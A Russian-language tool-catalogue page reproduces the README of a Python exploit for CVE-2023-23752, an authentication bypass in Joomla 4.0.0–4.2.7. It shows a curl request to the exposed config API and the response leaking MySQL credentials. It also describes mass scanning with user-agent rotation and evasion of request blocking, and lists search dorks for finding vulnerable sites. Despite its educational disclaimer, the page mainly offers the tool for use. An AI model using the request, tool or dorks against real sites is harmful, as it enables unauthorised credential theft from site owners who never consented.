Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-23752 — Эксплойт для CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7). | Kitploit
Инструменты/GitHubGitHub/pushkarup/cve-2023-23752
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеАутентификация
GitHubpushkarup/cve-2023-23752

CVE-2023-23752

Эксплойт для CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7).

Репозиторий
12 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-23752

Эксплойт для CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7).

Введение

Как уже обсуждалось, CVE-2023-23752 — это обход аутентификации, приводящий к утечке информации. Большинство публичных эксплойтов используют этот обход для получения конфигурации системы, которая содержит учётные данные базы данных MySQL Joomla! в открытом виде. Ниже показана утечка:

root@kitploit:~
$ curl -v http://10.9.49.205/api/index.php/v1/config/application?public=true
*   Trying 10.9.49.205:80...
* TCP_NODELAY set
* Connected to 10.9.49.205 (10.9.49.205) port 80 (#0)
> GET /api/index.php/v1/config/application?public=true HTTP/1.1
> Host: 10.9.49.205
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 20 Mar 2023 15:14:05 GMT
< Server: Apache/2.4.41 (Ubuntu)
< x-frame-options: SAMEORIGIN
< referrer-policy: strict-origin-when-cross-origin
< cross-origin-opener-policy: same-origin
< X-Powered-By: JoomlaAPI/1.0
< Expires: Wed, 17 Aug 2005 00:00:00 GMT
< Last-Modified: Mon, 20 Mar 2023 15:14:05 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Content-Length: 1983
< Content-Type: application/vnd.api+json; charset=utf-8
<
{"links":{"self":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true","next":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20","last":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"},"data":[{"type":"application","id":"224","attributes":{"offline":false,"id":224}},{"type":"application","id":"224","attributes":{"offline_message":"This site is down for maintenance.<br>Please check back again soon.","id":224}},{"type":"application","id":"224","attributes":{"display_offline_message":1,"id":224}},{"type":"application","id":"224","attributes":{"offline_image":"","id":224}},{"type":"application","id":"224","attributes":{"sitename":"vulncheck","id":224}},{"type":"application","id":"224","attributes":{"editor":"tinymce","id":224}},{"type":"application","id":"224","attributes":{"captcha":"0","id":224}},{"type":"application","id":"224","attributes":{"list_limit":20,"i* Connection #0 to host 10.9.49.205 left intact
d":224}},{"type":"application","id":"224","attributes":{"access":1,"id":224}},{"type":"application","id":"224","attributes":{"debug":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang_const":true,"id":224}},{"type":"application","id":"224","attributes":{"dbtype":"mysqli","id":224}},{"type":"application","id":"224","attributes":{"host":"localhost","id":224}},{"type":"application","id":"224","attributes":{"user":"root","id":224}},{"type":"application","id":"224","attributes":{"password":"labpass1","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla_db","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"xj3n0_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":{"dbsslverifyservercert":false,"id":224}}],"meta":{"total-pages":4}}

В приведённом выше доказательстве концепции сервер отвечает учётными данными root:labpass1, которые являются учётными данными для нашей тестовой учётной записи MySQL Joomla!. Однако важно знать, что наш тестовый MySQL-сервер был привязан к 127.0.0.1, поэтому удалённый злоумышленник не может получить к нему доступ, что делает эти учётные данные в основном бесполезными. Привязка MySQL к локальному хосту должна быть самой распространённой конфигурацией, что серьёзно ограничивает эту утечку учётных данных.

Отказ от ответственности: только для образовательных целей

Данный эксплойт и доказательство концепции (PoC) представлены исключительно в образовательных и информационных целях. Цель их публикации — продемонстрировать потенциальные уязвимости в контролируемой среде. Задача — способствовать пониманию концепций кибербезопасности и поощрять ответственное раскрытие информации.

Важные моменты:

  • Этичное использование: Данный эксплойт и PoC должны использоваться только в тех средах и системах, где у вас есть явное разрешение. Несанкционированный доступ к компьютерным системам является незаконным и неэтичным.
  • Ответственное раскрытие: Если вы обнаружите уязвимости в результате использования этого эксплойта и PoC, настоятельно рекомендуется сообщить о них ответственным лицам, предоставив им достаточное время для устранения проблем.
  • Не является одобрением: Данный PoC и сопутствующие материалы не одобряют и не поощряют любые формы несанкционированного доступа, взлома или любые другие незаконные действия.

Получая доступ и используя этот эксплойт и PoC, вы подтверждаете, что несёте полную ответственность за свои действия и соглашаетесь использовать эту информацию в соответствии с применимыми законами и нормативными актами. Автор не несёт ответственности за любое неправомерное использование или последствия, возникающие в результате использования данного PoC для каких-либо целей, кроме образования и ответственного раскрытия.

Возможности эксплойта

  • ОДИНОЧНОЕ СКАНИРОВАНИЕ: Сканирование одного сайта на наличие эксплойта.
  • МАССОВОЕ СКАНИРОВАНИЕ: Сканирование списка сайтов из файла на наличие эксплойта.
  • АСИНХРОННАЯ ПОТОЧНОСТЬ: Использование потоков для быстрой обработки.
  • ДИНАМИЧЕСКОЕ ОГРАНИЧЕНИЕ ЗАПРОСОВ: Реализация техники динамического ограничения запросов для предотвращения слишком быстрой отправки большого количества запросов, что может помочь избежать блокировки.
  • СУММИРОВАНИЕ РЕЗУЛЬТАТОВ: Обобщение результатов по окончании сканирования с предоставлением данных об успешных и неудачных сканированиях, а также о любых обнаруженных проблемах.
  • ПРОВЕРКА ВВОДА: Реализация проверки ввода, чтобы убедиться, что пользовательские данные, особенно из файлов, правильно структурированы и содержат допустимые URL.
  • РОТАЦИЯ USER-AGENT: Ротация заголовка User-Agent для каждого запроса для имитации разных браузеров и снижения вероятности блокировки.

Начало работы

Предварительные требования

  • Python 3.x
  • Необходимые пакеты Python: requests, colorama, urllib3, fake_useragent, aio-http

Установка

  1. Клонируйте репозиторий:

    root@kitploit:~
    git clone https://github.com/Pushkarup/CVE-2023-23752.git
    cd CVE-2023-23752
    
  2. Установите необходимые пакеты Python:

    root@kitploit:~
    pip install -r requirements.txt
    

Использование

  1. Создайте текстовый файл, содержащий целевые сайты (по одному на строку), и сохраните его с расширением .txt.
  • Соберите список сайтов для тестирования, используя дорки: inurl:/api/index.php/v1/config/application?public=true, intitle:"Index of" /api/index.php/v1/config/application?public=true, filetype:php inurl:/api/index.php/v1/config/application?public=true, intitle:"Index of" AND intext:"config" AND intext:"application" AND intext:"public=true"
  1. Запустите скрипт:

    root@kitploit:~
    python joomla.py
    
  2. Дайте скрипту выполниться и следуйте инструкциям.

  3. Каждый эксплуатированный сайт будет сохранён в файл Results.txt.

Вклад

Приветствуются любые вклады! Если вы нашли какие-либо проблемы или у вас есть предложения по улучшению, не стесняйтесь открывать pull request или создавать issue.

Лицензия

Этот проект лицензирован на условиях MIT License.

Контакты

  • GitHub: Pushkar Upadhyay
  • LinkedIn: Pushkar Upadhyay

Пожертвования

Поддержите проект

  • BTC: 3QqVBBzDBezA9U77PCTwMPQVGb1eecv2SP
  • ETH: 0xB779767483831BD98327A449C78FfccE2cc6df0a
  • USDT: 0xB779767483831BD98327A449C78FfccE2cc6df0a
Скачать инструмент